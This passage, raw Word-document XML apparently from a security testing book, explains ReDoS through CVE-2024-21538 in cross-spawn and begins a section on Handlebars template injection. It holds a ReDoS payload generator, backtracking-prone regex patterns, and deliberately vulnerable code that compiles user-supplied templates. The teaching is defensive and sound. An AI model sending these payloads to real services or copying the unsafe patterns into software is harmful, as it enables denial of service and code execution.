        </w:rPr>
        <w:t xml:space="preserve">Input Validation Performance Traps: When Chat Features Hang</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application validates user input through regular expression patterns you designed to ensure usernames meet formatting requirements, email addresses conform to expected structures, and message content excludes inappropriate material. These validation functions protect your application from malformed data while providing user-friendly feedback about input requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But regular expressions can exhibit exponential time complexity when processing specially crafted input strings that trigger catastrophic backtracking in pattern matching algorithms. Attackers exploit this algorithmic vulnerability by submitting input designed to cause your validation functions to consume excessive CPU resources, effectively creating denial-of-service conditions through single malformed requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-21538: The cross-spawn Vulnerability That Blocks Real Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application likely uses the cross-spawn package for spawning child processes - perhaps for file processing, image manipulation, or external command execution. Cross-spawn is a fundamental Node.js utility with millions of weekly downloads, making it a trusted component in most JavaScript applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2024-21538 reveals a ReDoS vulnerability in cross-spawn versions before 7.0.5. The vulnerability exists in the argument escaping logic that processes command-line parameters. When your chat application processes user-controlled data through cross-spawn - such as filename handling, command parameter construction, or process argument validation - specially crafted input can trigger exponential backtracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your file upload processing workflow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { spawn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ross-spawn'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// File processing in chat application</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">processUploadedFile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> options) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// User controls filename through file upload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// cross-spawn processes this through vulnerable regex</w:t>
      </w:r>
      <w:r>
        <w:br/>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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">spawn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'convert'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'-resize'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'200x200'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> filename</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">output</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker uploads a file with a malicious filename consisting of many backslashes followed by a special character:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciousFilenam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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">repeat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1000000</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When cross-spawn processes this filename through its argument escaping logic, the vulnerable regular expression triggers catastrophic backtracking. Your file processing function blocks the event loop for thirty seconds or more, preventing your chat application from processing any other requests. User authentication hangs, message posting stops responding, WebSocket connections timeout, and your entire chat service becomes unresponsive because one malicious filename submission exploited the cross-spawn vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your username validation logic illustrates similar vulnerability patterns. User registration requires usernames matching specific patterns: alphanumeric characters, underscores, and hyphens in reasonable combinations. Your validation function implements this requirement using a regular expression that seems straightforward and appropriate for the intended purpose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, certain regex constructions contain nested quantifiers that create exponential search spaces when matching fails. An attacker submits a username consisting of many repeated characters followed by a symbol that prevents successful matching. Your regex engine exhaustively explores every possible way to match the pattern against the input string before ultimately concluding that no match exists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This algorithmic complexity vulnerability affects various input validation scenarios throughout your chat application. Email validation during user registration, message content filtering for inappropriate material, search query processing for finding users or messages, and file name validation during avatar uploads all potentially contain regex patterns vulnerable to catastrophic backtracking attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic ReDoS Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates normal input scenarios that complete quickly: realistic usernames, valid email addresses, appropriate message content, reasonable search queries. Developers verify that validation functions accept correct input and reject malformed data appropriately. Testing doesn’t systematically explore input designed specifically to trigger worst-case algorithmic behavior in regex pattern matching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ReDoS attack generation targeting cross-spawn vulnerability</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateReDoSPayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// CVE-2024-21538 specific payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> backslashes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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">repeat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1000000</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trigger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backslashes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> trigger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Generic ReDoS patterns for validation testing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateValidationAttacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fuzzer) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"(a+)+$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Nested quantifiers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"([a-zA-Z]+)*$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Alternation with repetition</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"(a|a)*$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Alternation ambiguity</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"a+a+a+a+a+a+a+a+a+a+$"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Many quantifiers</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patterns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        fuzzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateWorstCaseInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(pattern)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The generation strategy requires analyzing your chat application’s validation patterns for algorithmic complexity vulnerabilities. Identify nested quantifiers, overlapping alternatives, and other regex constructions prone to catastrophic backtracking. Generate input strings that specifically target these pattern structures by creating scenarios that force the regex engine to explore maximum backtracking paths before failing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection focuses on execution time rather than functional correctness. Monitor how long validation operations take to complete and flag input that causes processing delays exceeding reasonable thresholds. Anything requiring more than one hundred milliseconds for simple input validation likely indicates algorithmic complexity problems that could be exploited for denial-of-service attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s validation logic demonstrates clear targets for performance testing. Username validation during registration ensures usernames conform to acceptable patterns. Message content filtering removes inappropriate material from chat conversations. Search query validation prevents injection while ensuring reasonable complexity. Room name validation enforces naming conventions for chat spaces. File processing through cross-spawn handles user uploads and content manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ReDoS vulnerabilities become particularly dangerous in chat applications because validation happens in the request processing path for user-facing features. When username validation hangs during registration, new users cannot create accounts. When message filtering blocks during content processing, chat conversations stop functioning. When search validation triggers exponential complexity, users cannot find messages or contacts. Single malicious inputs can render specific chat features completely unavailable for all users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach discovers whether validation patterns contain complexity vulnerabilities and exactly which input patterns trigger worst-case performance characteristics. This knowledge enables either fixing regex patterns to eliminate backtracking vulnerabilities or implementing timeout mechanisms to prevent validation operations from blocking chat application functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With input validation secured against algorithmic complexity attacks, focus shifts to template processing systems that might contain code execution vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="117"/>
    <w:bookmarkStart w:id="118" w:name="X5597406726d46cba3e0ac2e71b83924f6b6d28b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Template Injection Code Execution: When Chat Features Execute Arbitrary Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chat applications frequently use template engines for dynamic content generation: email notifications with user data, webhook integrations formatting user messages, custom message formatting for bots and integrations, and administrative reporting with user-provided content. These template systems become dangerous when they process user-controlled input without proper sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your notification email system. Users receive welcome messages when joining rooms, password reset instructions, and weekly digest emails with conversation highlights. Your email template system allows customization through user preference settings, enabling personalized greeting formats and content organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handlebar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handlebars'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendWelcomeEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userData) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// User controls template content through profile settings</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> template </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> userData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emailTemplate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Welcome {{name}} to {{roomName}}!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compiled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handlebars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">compile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(template)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Template injection occurs during compilation and execution</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
